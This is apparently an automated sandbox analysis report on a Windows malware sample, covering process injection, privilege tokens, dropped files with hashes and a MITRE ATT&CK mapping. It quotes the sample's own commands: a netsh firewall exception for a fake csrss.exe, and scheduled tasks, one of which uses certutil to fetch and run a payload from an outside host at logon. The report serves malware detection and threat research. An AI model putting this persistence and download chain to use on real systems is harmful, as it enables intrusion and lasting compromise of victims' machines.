0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a

Analysis

max time kernel
48s
max time network
151s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
Size

3.7MB
MD5

1436af0a5fb6bff43ffae58b7e4e3006
SHA1

119e334c5115fe195d4546625177fd25940abf91
SHA256

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a
SHA512

e2bf820f38284bc6284a41754ed7c6f6868cffb788b26fb2ad635a1e7deb82ffec5d8016289cefc77549c4cfbbaafe590ca84016363c2fdf2617071638f7c2b7

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Suspicious use of SetThreadContext 2 IoCs

Processes:

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

description	pid	process	target process
PID 1948 set thread context of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 set thread context of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220524023916.cab makecab.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1356 schtasks.exe
1608 schtasks.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220524023916.cab	makecab.exe

pid	process
1356	schtasks.exe
1608	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

pid	process
1588	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
1692	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

description	pid	process
Token: SeDebugPrivilege	1588	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
Token: SeImpersonatePrivilege	1588	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.execmd.exe

C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
"C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1948

C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
"C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
"C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:108

C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
"C:\Users\Admin\AppData\Local\Temp\0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
5⤵
PID:1976

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
6⤵
PID:1788

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
7⤵
- Creates scheduled task(s)
PID:1356

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:1608

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
7⤵
PID:528

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524023916.log C:\Windows\Logs\CBS\CbsPersist_20220524023916.cab
1⤵
- Drops file in Windows directory
PID:320

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:1084

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.1MB

MD5
40d7a2dd398172fa28fce0e88aa1280c

SHA1
16078378b812f0713774a6fc5c19ba89e5d8e436

SHA256
0859ee7f3a0be2f9f75e7bc9f56ee8cbd9be18c4865f9964b3021ead17169c0e

SHA512
55325fc82f072961ba45945db9696f1c3cef56eebfdf25bbc436e4750427da55ab40fd4a04543e0774d0fa3e9694b5c31114b3c2581c14dc687866d13a873cc2

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
c40a6e527d6b8d7bbf278d4754baf406

SHA1
2abc005251ef8e235e72d68d9ae7d890080189e8

SHA256
9f14038ffec513cff5f63fc1dfc9f4645223986e7dbb2e7b81804bd37efb4c72

SHA512
b6b47d34c213dab98b425be8297117231601ea71feb388663fcfdbe3eec89fa956edf092083e6311d593a426fec21a0933d4ff397f1605a602d8f8da4dbca6de

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.0MB

MD5
9580e18c4e2b6728200493f0ec10c843

SHA1
e55311fb84b1d595e2e21969477c171eb92e64b0

SHA256
e5eda6021ad5b4f3b9c25e233ac275272251255854019f9373bd85b1950af1b8

SHA512
3d2e9ebbc961ba81588e30093b2bab549b3cd82eee2e289f1966ffcb30bf2a88e0e72a6393ba16c09882e56ae569a4c96f9a8018f0e6b31482ff08852792baaf

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.1MB

MD5
e44f0d25c8d1260c3c1ad36e73640d2c

SHA1
7c8530fc542b37ed93264ae110b48d58a0cc88a7

SHA256
b15f860dcd404b1c5f8eddb8ae27506cc4f0b2e3051d409843c25320d99ae4a6

SHA512
2387ca2220cff17ac5ecae0cc1d8adf96e0125294850d635c10ee9a8fb96e082209e553c0397f2103eb89e1f6388f372404ee32f8bae5dab18d18c518d38eee7

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.2MB

MD5
ddd582ebb680ced28bb22f9bdcf3d821

SHA1
60e3ef708b1937a7635262f36c08d4297972864e

SHA256
409d3918b64c899452fe788dad822fc3339f5e481d4ef43089a6684a06df4f63

SHA512
6d6a9f7ef2543fbda4d1429952bd519469c1a2b65c5b0d7772fcd6176d15301f945d72e1e15de534b70634935c8d41bab7d8989809c3edc444d8253c2abb8d47

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
859KB

MD5
ccc37c6bb82a55fa399caf84f64a4c0d

SHA1
bcd74e328cc3e5049cfeb2125b58b747460bf046

SHA256
81329b139078ed641621644fae24d5cd033dd30cf1c0b47ed950d0d7872195a0

SHA512
a31b18bd6b8673977a3e8002f12c0564a8ebf4d5ff75cad340154441c6f5c3cf0b8b1d9da244fe1a7ac202e212e1af581a29bc09f0ec3af40c7cc78a135fc705

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
640KB

MD5
0d8d18a1a976fc852ca824109e56ab5e

SHA1
817369a97ca86fa6a5acccf55ecfa78569faf511

SHA256
28ca4314eb9137fb800bda3c6b402f843b0f515443cdb197b9da9fb3d9e5146e

SHA512
321b868235ba172e7485ec82d4d05ea705dc6c4c9f022be457bd0c0a727d7e3c4e44e8b5c12c63045e0f1745873e3ecaf6e628e23f09404ebdc126ca1a607711

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1.2MB

MD5
fdb5f16bdc57298b1a724b83598489f1

SHA1
9be6eff699b5bf86d0908b636ec04a05dca711dd

SHA256
adf4208db39b1def83fa9f18ecaa609d567c5e6fc30a0068335122d502254d0c

SHA512
b4633043693e8bbd500d74f380f88b847af1ecaef909c3970bc29608c59369050892d7be94b369844527eb2a19d1241b84b5f2dbb62b8e3a1c0cd495d3d6a944

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.0MB

MD5
d17a9494d4b05b4956f4a56adfb662d9

SHA1
4f6df0dc324fad1016c631ef01c8e043d68f5c9e

SHA256
6e6beec6da5566419f41436b86bb51dbb2c6fbdc1fc30c14d82f190411b1b39c

SHA512
c53293493be3ebc16b1b62f75282bd9680aee9ba9b9e573c3ee0147ea95c29232d7c9ada9e55cc65805eaf062fdd24950013e2d63ba66987f4054c91bf57a490

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.1MB

MD5
80b410b1f5cb6a415bac379516595517

SHA1
7d8ec5aaf49bcf0c02584e5fc30d5d86ea1d6cbb

SHA256
4db31b4b5cca73c377efc66eb71761280d61dea6363a7f37ca6ffa2b47ead29e

SHA512
803c7c086227b42e4c3a0d50204f677c3bf7ff5d342af6db5310c87acbf8346fc4910bdb22dc8ba63ee6253d453355f9a93a3ea9f360a5ddaf0bae9d8bbe4eae

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.0MB

MD5
b3cf8b1875c666d221adfe7e2fa46aca

SHA1
70a61a779ea1214c6a2e0e268c7882a597ca4bd9

SHA256
e5ecf1c67a8d37ad5c4e1dfd5a04544f062b3a4eec86ab9fbdb0f24da202ad22

SHA512
9ad916e1ba558afe6e29876bb2df5bc0a92fac7b8bc9dc4e3c693664d0015ef34a84e31c6e65e89bb79f7e62a4f5d2062281122a68a4397cba8cab571d2979af

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
411KB

MD5
25c60c46f910d33e7708873ef48f06da

SHA1
aefa468416d425b6d73e5a93d705492717d04263

SHA256
4b457d3b6f17bd51e1535b076c73455903dc2bdf61254c0c7cf7b14d54f61b82

SHA512
515b41ed1a9b8d72e5c245d43dd273253e28699d5bddf0ef4542684a2db6c5f3cdc393443ebef1d8d7191f95355a89dd3702d3b996c2a0a853232de890278ead

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
411KB

MD5
25c60c46f910d33e7708873ef48f06da

SHA1
aefa468416d425b6d73e5a93d705492717d04263

SHA256
4b457d3b6f17bd51e1535b076c73455903dc2bdf61254c0c7cf7b14d54f61b82

SHA512
515b41ed1a9b8d72e5c245d43dd273253e28699d5bddf0ef4542684a2db6c5f3cdc393443ebef1d8d7191f95355a89dd3702d3b996c2a0a853232de890278ead

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
386KB

MD5
fc18ed3a985acca1e1fac10f7df50a23

SHA1
eae0b8f1e405b1787ca5eb8504ebaa02678aa632

SHA256
4a0aeefafa1698378cadab83922fe2541829589ca0a62af66808bfd06a38a987

SHA512
9de961522754c5c821e7410261698793f90b8fefacba330483baeed9dc1006895582c33caedc99035003e325ab3105f0b03b5efb9f80e30790521bc28872ede9

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
0dbb570327695adfd7ca0f321413eaa1

SHA1
98a86bfd886da817e9dea8f06f3d57f871996c13

SHA256
9aabb3fef32a964f971ac2535c03184aa99e25f3c3e1147df6ea2a8c17b372ee

SHA512
14335cf81118c65191eb1553de8b1a2eb74890ddb1c314c3da2f0e48b2238f80c072f3d8cc2a0dc4a9544b0fc6edfa4474e8f061547adc589672696108df6b92

Download Submit
\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
a06efa5514427f8934cf7d122af72419

SHA1
41bdc1f68adf48c4bc7d7ee783b7fc3d4b645c1e

SHA256
57f9ebbdc71bd6f6ed143b93235836e7fec5b7be89ff46b55cf3e0fff1f65d0f

SHA512
9c3c9c5e811f18f7270645330e20968f910d12185d194ae2a6f447548d74814bf1b7427882bdbf917a8a825e0b0f895d31fcb915405f0cfccb03564c5a4a4099

Download Submit
memory/108-66-0x00000000024E0000-0x0000000002886000-memory.dmp

Filesize
3.6MB

Download
memory/108-62-0x00000000024E0000-0x0000000002886000-memory.dmp

Filesize
3.6MB

Download
memory/572-68-0x0000000000000000-mapping.dmp

Download
memory/1084-70-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp

Filesize
8KB

Download
memory/1084-69-0x0000000000000000-mapping.dmp

Download
memory/1588-61-0x0000000000400000-0x0000000000B0F000-memory.dmp

Filesize
7.1MB

Download
memory/1588-55-0x0000000000400000-0x0000000000B0F000-memory.dmp

Filesize
7.1MB

Download
memory/1588-56-0x00000000004515A0-mapping.dmp

Download
memory/1588-59-0x0000000000400000-0x0000000000B0F000-memory.dmp

Filesize
7.1MB

Download
memory/1692-64-0x00000000004515A0-mapping.dmp

Download
memory/1692-71-0x0000000000400000-0x0000000000B0F000-memory.dmp

Filesize
7.1MB

Download
memory/1788-84-0x0000000000400000-0x0000000000B0F000-memory.dmp

Filesize
7.1MB

Download
memory/1788-79-0x00000000004515A0-mapping.dmp

Download
memory/1948-54-0x0000000002620000-0x00000000029C6000-memory.dmp

Filesize
3.6MB

Download
memory/1948-60-0x00000000029D0000-0x00000000030C5000-memory.dmp

Filesize
7.0MB

Download
memory/1948-58-0x0000000002620000-0x00000000029C6000-memory.dmp

Filesize
3.6MB

Download
memory/1976-82-0x0000000002480000-0x0000000002826000-memory.dmp

Filesize
3.6MB

Download
memory/1976-76-0x0000000002480000-0x0000000002826000-memory.dmp

Filesize
3.6MB

Download
memory/1976-74-0x0000000000000000-mapping.dmp

Download

description	pid	process	target process
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1948 wrote to memory of 1588	1948	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 108 wrote to memory of 1692	108	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe
PID 1692 wrote to memory of 572	1692	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	cmd.exe
PID 1692 wrote to memory of 572	1692	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	cmd.exe
PID 1692 wrote to memory of 572	1692	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	cmd.exe
PID 1692 wrote to memory of 572	1692	0be1ac661b05603a69ef1fa42333798ecd998522b688a3cc9867cfd04c02506a.exe	cmd.exe
PID 572 wrote to memory of 1084	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1084	572	cmd.exe	netsh.exe
PID 572 wrote to memory of 1084	572	cmd.exe	netsh.exe